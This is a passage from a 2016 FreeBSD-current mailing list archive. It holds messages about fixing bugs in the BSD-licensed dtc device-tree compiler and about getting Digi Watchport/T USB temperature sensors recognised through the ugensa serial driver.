pxOeHLQAR8Prsbk+bUOQW+1awCxXp4mY9GyTXAkZFr4DHgx2i0iFkaG65dKmuszx 7TxyMInbdeOUG9CWEObOWfgtEojmIr3xnJzFtbMb7dvQ8twEGa9y1hTNnPuNWb1G kpzsnGuk1PpijLfqI59k =bXAj -----END PGP SIGNATURE----- --Apple-Mail=_5E843AA8-9210-43E8-B606-6925AE31C7BF-- From owner-freebsd-current@freebsd.org Sun Jul 24 11:43:26 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 9205FBA3786 for ; Sun, 24 Jul 2016 11:43:26 +0000 (UTC) (envelope-from theraven@FreeBSD.org) Received: from theravensnest.org (theraven.freebsd.your.org [216.14.102.27]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client CN "cloud.theravensnest.org", Issuer "StartCom Class 1 DV Server CA" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 720C91603; Sun, 24 Jul 2016 11:43:25 +0000 (UTC) (envelope-from theraven@FreeBSD.org) Received: from [192.168.0.7] (cpc91230-cmbg18-2-0-cust661.5-4.cable.virginm.net [82.1.230.150]) (authenticated bits=0) by theravensnest.org (8.15.2/8.15.2) with ESMTPSA id u6OBh2KG062727 (version=TLSv1 cipher=ECDHE-RSA-AES256-SHA bits=256 verify=NO); Sun, 24 Jul 2016 11:43:14 GMT (envelope-from theraven@FreeBSD.org) X-Authentication-Warning: theravensnest.org: Host cpc91230-cmbg18-2-0-cust661.5-4.cable.virginm.net [82.1.230.150] claimed to be [192.168.0.7] Content-Type: multipart/signed; boundary="Apple-Mail=_5535C2D6-60F8-47F4-84C0-9C639C942496"; protocol="application/pkcs7-signature"; micalg=sha1 Mime-Version: 1.0 (Mac OS X Mail 9.3 \(3124\)) Subject: Re: Call for Testing: Switching back to our BSD licensed dtc(1) From: David Chisnall In-Reply-To: <20160719214947.ae2edc38528eaaab1388403f@bidouilliste.com> Date: Sun, 24 Jul 2016 12:42:54 +0100 Cc: Ed Maste , FreeBSD Current Message-Id: References: <20160719214947.ae2edc38528eaaab1388403f@bidouilliste.com> To: Emmanuel Vadot X-Mailer: Apple Mail (2.3124) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 24 Jul 2016 11:43:26 -0000 --Apple-Mail=_5535C2D6-60F8-47F4-84C0-9C639C942496 Content-Transfer-Encoding: quoted-printable Content-Type: text/plain; charset=utf-8 Thanks, On 19 Jul 2016, at 20:49, Emmanuel Vadot wrote: >=20 >=20 > Hello, >=20 > I've just tried bsd dtc on all arm dts that we have. > It doesn't seems to handle multiple include directories. > Here is how to reproduce : >=20 > $ export SRCROOT=3D/path/to/fbsd/src > $ export MACHINE=3Darm > $ cd $SRCROOT/sys/boot/fdt/dts/arm > $ $SRCROOT/sys/tools/fdt/make_dtb.sh $SRCROOT/sys > beaglebone-black.dts . converting beaglebone-black.dts > -> ./beaglebone-black.dtb Unable to open file > = '/home/elbarto/Work/freebsd/freebsd.git//sys/boot/fdt/dts/arm/am33xx-clock= s.dtsi'. > No such file or directory Unable to open file > = '/home/elbarto/Work/freebsd/freebsd.git//sys/boot/fdt/dts/arm/tps65217.dts= i'. > No such file or directory >=20 > Both dtsi files are include with /include/ (i.e. not handled by cpp). > make_dtb.sh specify : -i $S/boot/fdt/dts/${MACHINE} -i > $S/gnu/dts/${MACHINE}, it looks like the second one isn't added to the > list. It actually is added to the list and found. The bug here is in error = reporting - it was reporting an error for each file that it tried to = open but couldn=E2=80=99t, even when it subsequently found the correct = file. >=20 > Trying tegra124-jetson-tk1-fbsd.dts give this : > converting tegra124-jetson-tk1-fbsd.dts > -> /tmp/bsd_dtb//tegra124-jetson-tk1-fbsd.dtb Error on line 1214: > Expected node name interrupt-affinity =3D <&{/cpus/cpu@0}>, > ^ > Error on line 1214: Expected ; at end of property > interrupt-affinity =3D <&{/cpus/cpu@0}>, > ^ > Failed to parse tree. Unhappy face! There was a FIXME relating to this in the code. =20 I=E2=80=99ve now fixed both of these in the version here: https://github.com/davidchisnall/dtc I=E2=80=99ll push the changes to FreeBSD svn soon, but in the meantime = anyone wanting to test can just clone that repo over the dtc directory = in their src checkout. David --Apple-Mail=_5535C2D6-60F8-47F4-84C0-9C639C942496 Content-Disposition: attachment; filename=smime.p7s Content-Type: application/pkcs7-signature; name=smime.p7s Content-Transfer-Encoding: base64 MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIK5jCCBPww ggPkoAMCAQICECJrrb9nBol9MHok/UZg/AYwDQYJKoZIhvcNAQELBQAwdTELMAkGA1UEBhMCSUwx FjAUBgNVBAoTDVN0YXJ0Q29tIEx0ZC4xKTAnBgNVBAsTIFN0YXJ0Q29tIENlcnRpZmljYXRpb24g QXV0aG9yaXR5MSMwIQYDVQQDExpTdGFydENvbSBDbGFzcyAxIENsaWVudCBDQTAeFw0xNjA0MTkw OTI3NDJaFw0xNzA0MTkwOTI3NDJaMEQxHTAbBgNVBAMMFHRoZXJhdmVuQGZyZWVic2Qub3JnMSMw IQYJKoZIhvcNAQkBFhR0aGVyYXZlbkBmcmVlYnNkLm9yZzCCASIwDQYJKoZIhvcNAQEBBQADggEP ADCCAQoCggEBALsL5pEhrGjrswHVdMHWhgxb8ARKDYRePSqpDLmjJ40bpx+n1zrvIwjC2Vk2IpoD 04rg5Pog2IrhnX+Qk2NSXzBXWj2JAaTc9OtSeAY0BtgJYXONGONQbRKVy97QBdzd1SbMEzDrOgH5 UDI+5sF1PboOTmLyTAPI9273XdfZ0BnstUXs8NXr/7p9E5CWJOsO1iQcINbm4XiwC1PLNMeWUknE Nji/hFKwcE8IFtaUe1ymbw6yA3rBpDu3KewIRD1T66FPTZJeIzvUoBIqWd+GAOfCBG2QYmbc3y/x K2hCtcXThcB1uVFA2q39koLKA8wHyqv4Jhm3wzhAqKDsWK4bGW0CAwEAAaOCAbcwggGzMA4GA1Ud DwEB/wQEAwIEsDAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwQwCQYDVR0TBAIwADAdBgNV HQ4EFgQU5J3Kc8GeW8pEGxBkcMoA7eUOPRwwHwYDVR0jBBgwFoAUJIFsOWG+SQ+PtxtGK8kotSdI bWgwbwYIKwYBBQUHAQEEYzBhMCQGCCsGAQUFBzABhhhodHRwOi8vb2NzcC5zdGFydHNzbC5jb20w OQYIKwYBBQUHMAKGLWh0dHA6Ly9haWEuc3RhcnRzc2wuY29tL2NlcnRzL3NjYS5jbGllbnQxLmNy dDA4BgNVHR8EMTAvMC2gK6AphidodHRwOi8vY3JsLnN0YXJ0c3NsLmNvbS9zY2EtY2xpZW50MS5j cmwwHwYDVR0RBBgwFoEUdGhlcmF2ZW5AZnJlZWJzZC5vcmcwIwYDVR0SBBwwGoYYaHR0cDovL3d3 dy5zdGFydHNzbC5jb20vMEYGA1UdIAQ/MD0wOwYLKwYBBAGBtTcBAgUwLDAqBggrBgEFBQcCARYe aHR0cDovL3d3dy5zdGFydHNzbC5jb20vcG9saWN5MA0GCSqGSIb3DQEBCwUAA4IBAQBSBDH+kZf5 bZkNFcMSPdfnGC7F8utBIxs2bi3JQjsBoQTm1vnXdwgINSfO9At6iQZHoEyj8ZE6PcMFuEU0+bk0 aE8aYcW59WnxfWx943upZoMhX0YVaJcFK01EHFrddRAP44sh7Eu6JtdFuAG+6btDReMcg35Qm65X 7/280aVm7awadJ+IQs8r9qBVk2NFqkvHCETtJjNWXd7M6mcsfXstvykbubPQH/VNW/zrX6yzIcI4 aoz+Sn8RJmHNkk6cImqe1KvsdDLXmqCoeoMwos62pT18RaI//jwTdmnf5EHFMlevnxOr7rzA++71 OSZfdYf6+nvHOod1F721rNuy6lxFMIIF4jCCA8qgAwIBAgIQa6eKfQrXiNZRCvlZ5Oe04TANBgkq hkiG9w0BAQsFADB9MQswCQYDVQQGEwJJTDEWMBQGA1UEChMNU3RhcnRDb20gTHRkLjErMCkGA1UE CxMiU2VjdXJlIERpZ2l0YWwgQ2VydGlmaWNhdGUgU2lnbmluZzEpMCcGA1UEAxMgU3RhcnRDb20g Q2VydGlmaWNhdGlvbiBBdXRob3JpdHkwHhcNMTUxMjE2MDEwMDA1WhcNMzAxMjE2MDEwMDA1WjB1 MQswCQYDVQQGEwJJTDEWMBQGA1UEChMNU3RhcnRDb20gTHRkLjEpMCcGA1UECxMgU3RhcnRDb20g Q2VydGlmaWNhdGlvbiBBdXRob3JpdHkxIzAhBgNVBAMTGlN0YXJ0Q29tIENsYXNzIDEgQ2xpZW50 IENBMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvX3a98OifYP2W4L921tfrh4bdcC1 Ga+YJKy7V3nYNewJHnzMlBsK0Hb8Dm4Wo3FZpylcYa1MJGT10QMGWaLER3xCIuRR+8eklf/EqeZW RLojJ7zBRtjMywPOCelrOU+DX12dKp+Ez4J6919rz1UudTO1GvZyCYJ/I7062uHsskM8b7gPxmcC oO1UHwwpgkvpCArJWGFoFzjLdsZbErJcS3HtAhlkbE/BKTMrdYg35Uo12SLBO5tbk8h2imbKTC8i Ms+pskrvI/AVlh6QoTTXk6xboVX6zgMgzxSVVLymQiygYYm0y5aMsvi2raFhC643SOGvErWWPPnS EfbeAD1xswIDAQABo4IBZDCCAWAwDgYDVR0PAQH/BAQDAgEGMB0GA1UdJQQWMBQGCCsGAQUFBwMC BggrBgEFBQcDBDASBgNVHRMBAf8ECDAGAQH/AgEAMDIGA1UdHwQrMCkwJ6AloCOGIWh0dHA6Ly9j cmwuc3RhcnRzc2wuY29tL3Nmc2NhLmNybDBmBggrBgEFBQcBAQRaMFgwJAYIKwYBBQUHMAGGGGh0 dHA6Ly9vY3NwLnN0YXJ0c3NsLmNvbTAwBggrBgEFBQcwAoYkaHR0cDovL2FpYS5zdGFydHNzbC5j b20vY2VydHMvY2EuY3J0MB0GA1UdDgQWBBQkgWw5Yb5JD4+3G0YrySi1J0htaDAfBgNVHSMEGDAW gBROC+8apEBbpRdphzDKNGhD0EGu8jA/BgNVHSAEODA2MDQGBFUdIAAwLDAqBggrBgEFBQcCARYe aHR0cDovL3d3dy5zdGFydHNzbC5jb20vcG9saWN5MA0GCSqGSIb3DQEBCwUAA4ICAQCL4/eH7AGL hK0PAQJbnOEjJyMEvTTwcAJuUh/bodjQl06u4putYOxdSyIjSP/sKt+31LmjG8+IO1WqykE4H/Lm 7NKezWVnCHuwb3ptgFmlwbMbGkU2MOZBtwzfKXdYUhFLhaE2uw5jXhXvLYitQay962wP5uPI6eAI hV4L8aaya1u4s7MnrTq0Rz25FuGNO79vTHYWj797tSRC8rM16js4yGKOLFpQvIg0F8IElv57b1st p+C7omqM5Qn15dePbSnqr8Jb65WtmJJbnv6rlqfY/aLuE/zmNAlzLmPgfMDStKIXdg+EoYBZTEo8 wBUaBxihfNbJ069ndQOxMNNqBelEMgpAtmjTbCuXFjqIwWq+XOx6ZV/Wh2FAmaLsSHlNvEjjSQMZ wE4EeHCdo66ZmEs/5JYlCeOkulKVQ6P3m5/XOj2jP17Q2AgmjP+11+sHN7PvrG0OwrQp9QMe3X+r n0G8MjtFfqBWvR9CgLIxzM3MJNxFdgdjS2rYnShP5uxvqwfZvhZVYCIkqdJhpYON0DvSodfiar0w iM79mySZJjzC0CTbiisBzS/BeBhqeo2wFfli/iw3hn1XKvAx0ty6w/scmBF0AYqmRHYj1TjMSw0l Al7AztLglqWjUPI+sukvadMRPxmtKXlS2nVR4an/Z16imsZ69+fFYH68c1CK7zmjozGCA04wggNK AgEBMIGJMHUxCzAJBgNVBAYTAklMMRYwFAYDVQQKEw1TdGFydENvbSBMdGQuMSkwJwYDVQQLEyBT dGFydENvbSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEjMCEGA1UEAxMaU3RhcnRDb20gQ2xhc3Mg MSBDbGllbnQgQ0ECECJrrb9nBol9MHok/UZg/AYwCQYFKw4DAhoFAKCCAZkwGAYJKoZIhvcNAQkD MQsGCSqGSIb3DQEHATAcBgkqhkiG9w0BCQUxDxcNMTYwNzI0MTE0MjU1WjAjBgkqhkiG9w0BCQQx FgQUTQFDItURCegrjyRt2gnqOZllICUwgZoGCSsGAQQBgjcQBDGBjDCBiTB1MQswCQYDVQQGEwJJ TDEWMBQGA1UEChMNU3RhcnRDb20gTHRkLjEpMCcGA1UECxMgU3RhcnRDb20gQ2VydGlmaWNhdGlv biBBdXRob3JpdHkxIzAhBgNVBAMTGlN0YXJ0Q29tIENsYXNzIDEgQ2xpZW50IENBAhAia62/ZwaJ fTB6JP1GYPwGMIGcBgsqhkiG9w0BCRACCzGBjKCBiTB1MQswCQYDVQQGEwJJTDEWMBQGA1UEChMN U3RhcnRDb20gTHRkLjEpMCcGA1UECxMgU3RhcnRDb20gQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkx IzAhBgNVBAMTGlN0YXJ0Q29tIENsYXNzIDEgQ2xpZW50IENBAhAia62/ZwaJfTB6JP1GYPwGMA0G CSqGSIb3DQEBAQUABIIBAIKwvxf6E8rfztFmmYWw+WgeBkbqtMqWnj9YFJEoI6IO5UVjtA0e4Gje g9EQl5tt1lqMZ072aK+6++ZWPfHdV1uS6Q9vxEGEmrQvO1KaVTVO2Ef2jtyuoIgh7xIgt5wQHIzw 05pc08qBv1Ipro00imQdkOuTpkXdRDiWjJr8ly0zYMofQTXr2sW/6MOZCodjszLZi9kghjcG7gC2 eoe1QZFBSlFeEp10MMvO3DNIrO3tzIgX83LBdh/mWsN89gZzR9nkxw7envZdVP9+BzosRmnpAgCL /3NMyAO2yqGlVc0Bw7t57Laj2k8DfQB4vKk7CvrAkiDWj8ncR6YhpvgOsYgAAAAAAAA= --Apple-Mail=_5535C2D6-60F8-47F4-84C0-9C639C942496-- From owner-freebsd-current@freebsd.org Sun Jul 24 16:55:43 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id B13ABBA3DEC for ; Sun, 24 Jul 2016 16:55:43 +0000 (UTC) (envelope-from ian@freebsd.org) Received: from pmta2.delivery6.ore.mailhop.org (pmta2.delivery6.ore.mailhop.org [54.200.129.228]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id 92FDE132B for ; Sun, 24 Jul 2016 16:55:43 +0000 (UTC) (envelope-from ian@freebsd.org) X-MHO-User: 98520d4a-51bf-11e6-8929-8ded99d5e9d7 X-Report-Abuse-To: https://support.duocircle.com/support/solutions/articles/5000540958-duocircle-standard-smtp-abuse-information X-Originating-IP: 73.34.117.227 X-Mail-Handler: DuoCircle Outbound SMTP Received: from ilsoft.org (unknown [73.34.117.227]) by outbound2.ore.mailhop.org (Halon Mail Gateway) with ESMTPSA; Sun, 24 Jul 2016 16:56:41 +0000 (UTC) Received: from rev (rev [172.22.42.240]) by ilsoft.org (8.15.2/8.14.9) with ESMTP id u6OGtYPW013863; Sun, 24 Jul 2016 10:55:34 -0600 (MDT) (envelope-from ian@freebsd.org) Message-ID: <1469379334.84197.40.camel@freebsd.org> Subject: Re: Digi Watchport/T temperature sensor as /dev/ttyU From: Ian Lepore To: "O. Hartmann" , Gary Jennejohn Cc: freebsd-usb@freebsd.org, FreeBSD CURRENT Date: Sun, 24 Jul 2016 10:55:34 -0600 In-Reply-To: <20160724105134.184f0b7f.ohartman@zedat.fu-berlin.de> References: <20160722183556.2fc39fd7.ohartman@zedat.fu-berlin.de> <1469206374.84197.14.camel@freebsd.org> <20160723220430.34ce02fe.ohartman@zedat.fu-berlin.de> <1469306951.84197.31.camel@freebsd.org> <20160724080330.3a27e875.ohartman@zedat.fu-berlin.de> <20160724083859.4c0dd392@ernst.home> <20160724105134.184f0b7f.ohartman@zedat.fu-berlin.de> Content-Type: text/plain; charset="us-ascii" X-Mailer: Evolution 3.16.5 FreeBSD GNOME Team Port Mime-Version: 1.0 Content-Transfer-Encoding: 7bit X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 24 Jul 2016 16:55:43 -0000 On Sun, 2016-07-24 at 10:51 +0200, O. Hartmann wrote: > Am Sun, 24 Jul 2016 08:38:59 +0200 > Gary Jennejohn schrieb: > > > On Sun, 24 Jul 2016 08:03:30 +0200 > > "O. Hartmann" wrote: > > > > > Am Sat, 23 Jul 2016 14:49:11 -0600 > > > Ian Lepore schrieb: > > > > > > > On Sat, 2016-07-23 at 22:04 +0200, O. Hartmann wrote: > > > > > Am Fri, 22 Jul 2016 10:52:54 -0600 > > > > > Ian Lepore schrieb: > > > > > > > > > > > On Fri, 2016-07-22 at 18:35 +0200, O. Hartmann wrote: > > > > > > > For temperature monitoring, we have a bunch of Digi > > > > > > > Watchport/T > > > > > > > sensors: > > > > > > > > > > > > > > http://ftp1.digi.com/support/documentation/90000406_H.pdf > > > > > > > > > > > > > > > > > > > > [...] > > > > > > > > > > > > I think the attached patch will make it show up as a > > > > > > ttyU*/cuaU* > > > > > > device > > > > > > for you. (You should probably use the /dev/cuaU* flavor, > > > > > > to avoid > > > > > > problems with tty layer and modem control signals). > > > > > > > > > > > > I keep wishing we had a mechanism, like a sysctl that could > > > > > > be set > > > > > > or > > > > > > something, that would let you supply a vendor/product pair > > > > > > and have > > > > > > the > > > > > > ugensa driver attach to that device, for quick testing of > > > > > > this sort > > > > > > of > > > > > > thing. > > > > > > > > > > > > -- Ian > > > > > > > > > > No, it doesn't change anything. I applied the patch to most > > > > > recent > > > > > CURRENT and it is > > > > > still the same. But thanks anyway. > > > > > > > > > > Kind regards, > > > > > > > > > > oh > > > > > > > > Oh, my bad, I forgot to mention: You'll have to manually > > > > "kldload > > > > ugensa" before plugging in the device (or load it from your > > > > loader.conf). > > > > > > > > When the change gets committed (assuming it works), the devd > > > > usb > > > > scripts will get regenerated, and that's what handles the auto > > > > -load of > > > > the driver. > > > > > > > > -- Ian > > > man ugensa doesn't exist! As I wrote earlier, I tried everything > > > to load what I could > > > find. It seems, the patch and the hint about ugensa.ko did the > > > magic ;-) Thank you > > > very much! Could the patch be made permanent to FreeBSD CURRENT? > > > > > > And also important: where is the man page for ugensa? Can the the > > > module be compiled > > > staitcally into the kernel or are there pitfalls? > > > > > > > Even the most complete man page found in the internet, the one from > > Dragonfly, doesn't list your Digi International device as being one > > of those supported. > > Yes. That is a pity. But Linux seems to operate this serial device. I > have to check next > time I get hands on a Linux box, what driver is attached to the > sensor. > > > > > Still, having the man page under FreeBSD would at least provide a > > hint > > that the driver even exists. > > Agreed. > > > > > I added device ugensa to my config file and the kernel was > > generated > > without an error. > > Me, too. > > > > > > root@localhost: [src] kldload ugensa > > > > > > ugen2.7: at usbus2 > > > ugensa0: > > > on usbus2 > > > ugensa0: Found 1 interfaces. > > > root@thor: [src] man ugensa > > > No manual entry for ugensa > > > root@localhost: [src] ll /dev/cuaU0* > > > 203 crw-rw---- 1 uucp dialer - 0xcb Jul 24 07:51 /dev/cuaU0 > > > 204 crw-rw---- 1 uucp dialer - 0xcc Jul 24 07:51 > > > /dev/cuaU0.init > > > 205 crw-rw---- 1 uucp dialer - 0xcd Jul 24 07:51 > > > /dev/cuaU0.lock > > > > > > > > > I'll try now to get informations out of the device, I let you > > > know whether that is a > > > success. But anyway, again, thank you for helping making the > > > device visible and > > > available. > > > > > I had no luck with retrieving informations out of the device by the > Perl5 script provided > by Nagios.org. A prerequisite for the Perl script is the FreeBSD port > > comms/p5-Device-SerialPort > > Patching the script is trivial, but I do not know whether the > backend, > comms/p5-Device-SerialPort, works a sexpected. So the first, dirty, > trial ended up in > nothing - since the information gained from the sensor is an empty > string/nothing. > > I'm not familiar with serial devices, so far, so probably there is > something trivial > missing. I looked around for some info on these Watchport devices. Their manual indicates that they use both serial comms to send commands and receive data, and they use serial-comms modem control signals (RTS/CTS, DTR, etc). Some googling makes it look like they use a TI 5052 USB serial chip. On linux, that would be handled by the io_ti USB serial driver. All of that adds up to the freebsd ugensa driver (which is "generic serial IO") probably not working. The ugensa driver has nothing chip -specific in it, it's for accessing devices which can do bulk read/write without needing to configure any of the other serial comms parameters. The ugensa driver works with things like gps receivers that have simple text-only interfaces. I think these watchport devices will likely need real serial comms configuration -- baud rate at least, to even be able to talk to them. In other words, freebsd needs a real driver for TI 5052 chips. It looks like a fairly complete datasheet for the chip is available (but I don't have time to write a driver myself). -- Ian From owner-freebsd-current@freebsd.org Sun Jul 24 18:42:08 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 3CAD7BA18FF; Sun, 24 Jul 2016 18:42:08 +0000 (UTC) (envelope-from kob6558@gmail.com) Received: from mail-io0-x22a.google.com (mail-io0-x22a.google.com [IPv6:2607:f8b0:4001:c06::22a]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 01BB6186E; Sun, 24 Jul 2016 18:42:08 +0000 (UTC) (envelope-from kob6558@gmail.com) Received: by mail-io0-x22a.google.com with SMTP id q83so145236752iod.1; Sun, 24 Jul 2016 11:42:07 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:sender:in-reply-to:references:from:date:message-id :subject:to:cc; bh=a325cawI4RKbZ7+6/uA4y713IcPgd0azRAJKGg4Nwug=; b=hfFjUMJMebhQd70iYosnVE2KBOziz+ODO7CkUL7voQiKR5g2aQ8Z3jOcO3zPhTMPbG Xwn+yuPh1/QwwIxeY78ZRyoadNX8P+Bdo17VRkIC/1jgFds8KQ2kJ+KbSMEWFyxoGuST DlZZHqg416c8vjjmiHTXEz3eZy9auFPTsastz/OKdawa6k6al/EYiJS3FxZBabK6yNIE xiPLBUvgobG/hp7PHxwQe3rAqDlVAohoqpFuyOV3xy920vYjFaxctLu8ptX8ozlOqmwl FXVrRr3Xr2a3hCRf+Psvvr5vCNn9Axi/zWYIfnB6aANxkhTIH3ZCKXiPOgsYeaY2utPe UU9w== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:mime-version:sender:in-reply-to:references:from :date:message-id:subject:to:cc; bh=a325cawI4RKbZ7+6/uA4y713IcPgd0azRAJKGg4Nwug=; b=Fo7CfFP+O8QAKXJArEcFir+3HjE45eWNSYwynWLP7p+kccGETVEyjTnr4dTS4/Juzh OUEWOigdO453+IuCcuf1ZDTq5f8akc8+3B+x19X4ecWDomMevUNldtBlonpyEFUrayhV v4D6cYcCTv8uCzZdJsCZp8HQNJSUERBz3H377AkswE8EYnYUhlX1wQCem83sC1riLbI+ 5/iR269N8zXiYSxxgkdMjXPpaEqAKGVyBqaGfL18rsS9hgRPE9HPt26VFFymskz0na82 WqOgGlFox9ZYa0MrseWymBGe/ZtJu56V2oJOWAhYT2LaKq07qwz3jTPHN/cD5gxZgUVv +90A== X-Gm-Message-State: AEkoous8ddxcNESKVpuD5hXnmwta1l4Gf8k0lkZWO0RmnCzSwfz7qzgOfuxTEnCslKhim85gffbv348Qus26Ag== X-Received: by 10.107.129.152 with SMTP id l24mr16603246ioi.179.1469385727318; Sun, 24 Jul 2016 11:42:07 -0700 (PDT) MIME-Version: 1.0 Sender: kob6558@gmail.com Received: by 10.79.78.213 with HTTP; Sun, 24 Jul 2016 11:42:06 -0700 (PDT) In-Reply-To: <1469379334.84197.40.camel@freebsd.org> References: <20160722183556.2fc39fd7.ohartman@zedat.fu-berlin.de> <1469206374.84197.14.camel@freebsd.org> <20160723220430.34ce02fe.ohartman@zedat.fu-berlin.de> <1469306951.84197.31.camel@freebsd.org> <20160724080330.3a27e875.ohartman@zedat.fu-berlin.de> <20160724083859.4c0dd392@ernst.home> <20160724105134.184f0b7f.ohartman@zedat.fu-berlin.de> <1469379334.84197.40.camel@freebsd.org> From: Kevin Oberman Date: Sun, 24 Jul 2016 11:42:06 -0700 X-Google-Sender-Auth: ErFVBtR9kHSlW0SwlkLJAQwS_x8 Message-ID: Subject: Re: Digi Watchport/T temperature sensor as /dev/ttyU To: Ian Lepore Cc: "O. Hartmann" , Gary Jennejohn , "freebsd-usb@FreeBSD.org" , FreeBSD CURRENT Content-Type: text/plain; charset=UTF-8 X-Content-Filtered-By: Mailman/MimeDel 2.1.22 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 24 Jul 2016 18:42:08 -0000 On Sun, Jul 24, 2016 at 9:55 AM, Ian Lepore wrote: > On Sun, 2016-07-24 at 10:51 +0200, O. Hartmann wrote: > > Am Sun, 24 Jul 2016 08:38:59 +0200 > > Gary Jennejohn schrieb: > > > > > On Sun, 24 Jul 2016 08:03:30 +0200 > > > "O. Hartmann" wrote: > > > > > > > Am Sat, 23 Jul 2016 14:49:11 -0600 > > > > Ian Lepore schrieb: > > > > > > > > > On Sat, 2016-07-23 at 22:04 +0200, O. Hartmann wrote: > > > > > > Am Fri, 22 Jul 2016 10:52:54 -0600 > > > > > > Ian Lepore schrieb: > > > > > > > > > > > > > On Fri, 2016-07-22 at 18:35 +0200, O. Hartmann wrote: > > > > > > > > For temperature monitoring, we have a bunch of Digi > > > > > > > > Watchport/T > > > > > > > > sensors: > > > > > > > > > > > > > > > > http://ftp1.digi.com/support/documentation/90000406_H.pdf > > > > > > > > > > > > > > > > > > > > > > > [...] > > > > > > > > > > > > > > I think the attached patch will make it show up as a > > > > > > > ttyU*/cuaU* > > > > > > > device > > > > > > > for you. (You should probably use the /dev/cuaU* flavor, > > > > > > > to avoid > > > > > > > problems with tty layer and modem control signals). > > > > > > > > > > > > > > I keep wishing we had a mechanism, like a sysctl that could > > > > > > > be set > > > > > > > or > > > > > > > something, that would let you supply a vendor/product pair > > > > > > > and have > > > > > > > the > > > > > > > ugensa driver attach to that device, for quick testing of > > > > > > > this sort > > > > > > > of > > > > > > > thing. > > > > > > > > > > > > > > -- Ian > > > > > > > > > > > > No, it doesn't change anything. I applied the patch to most > > > > > > recent > > > > > > CURRENT and it is > > > > > > still the same. But thanks anyway. > > > > > > > > > > > > Kind regards, > > > > > > > > > > > > oh > > > > > > > > > > Oh, my bad, I forgot to mention: You'll have to manually > > > > > "kldload > > > > > ugensa" before plugging in the device (or load it from your > > > > > loader.conf). > > > > > > > > > > When the change gets committed (assuming it works), the devd > > > > > usb > > > > > scripts will get regenerated, and that's what handles the auto > > > > > -load of > > > > > the driver. > > > > > > > > > > -- Ian > > > > man ugensa doesn't exist! As I wrote earlier, I tried everything > > > > to load what I could > > > > find. It seems, the patch and the hint about ugensa.ko did the > > > > magic ;-) Thank you > > > > very much! Could the patch be made permanent to FreeBSD CURRENT? > > > > > > > > And also important: where is the man page for ugensa? Can the the > > > > module be compiled > > > > staitcally into the kernel or are there pitfalls? > > > > > > > > > > Even the most complete man page found in the internet, the one from > > > Dragonfly, doesn't list your Digi International device as being one > > > of those supported. > > > > Yes. That is a pity. But Linux seems to operate this serial device. I > > have to check next > > time I get hands on a Linux box, what driver is attached to the > > sensor. > > > > > > > > Still, having the man page under FreeBSD would at least provide a > > > hint > > > that the driver even exists. > > > > Agreed. > > > > > > > > I added device ugensa to my config file and the kernel was > > > generated > > > without an error. > > > > Me, too. > > > > > > > > > root@localhost: [src] kldload ugensa > > > > > > > > ugen2.7: at usbus2 > > > > ugensa0: > > > > on usbus2 > > > > ugensa0: Found 1 interfaces. > > > > root@thor: [src] man ugensa > > > > No manual entry for ugensa > > > > root@localhost: [src] ll /dev/cuaU0* > > > > 203 crw-rw---- 1 uucp dialer - 0xcb Jul 24 07:51 /dev/cuaU0 > > > > 204 crw-rw---- 1 uucp dialer - 0xcc Jul 24 07:51 > > > > /dev/cuaU0.init > > > > 205 crw-rw---- 1 uucp dialer - 0xcd Jul 24 07:51 > > > > /dev/cuaU0.lock > > > > > > > > > > > > I'll try now to get informations out of the device, I let you > > > > know whether that is a > > > > success. But anyway, again, thank you for helping making the > > > > device visible and > > > > available. > > > > > > > > > I had no luck with retrieving informations out of the device by the > > Perl5 script provided > > by Nagios.org. A prerequisite for the Perl script is the FreeBSD port > > > > comms/p5-Device-SerialPort > > > > Patching the script is trivial, but I do not know whether the > > backend, > > comms/p5-Device-SerialPort, works a sexpected. So the first, dirty, > > trial ended up in > > nothing - since the information gained from the sensor is an empty > > string/nothing. > > > > I'm not familiar with serial devices, so far, so probably there is > > something trivial > > missing. > > I looked around for some info on these Watchport devices. Their manual > indicates that they use both serial comms to send commands and receive > data, and they use serial-comms modem control signals (RTS/CTS, DTR, > etc). Some googling makes it look like they use a TI 5052 USB serial > chip. On linux, that would be handled by the io_ti USB serial driver. > > All of that adds up to the freebsd ugensa driver (which is "generic > serial IO") 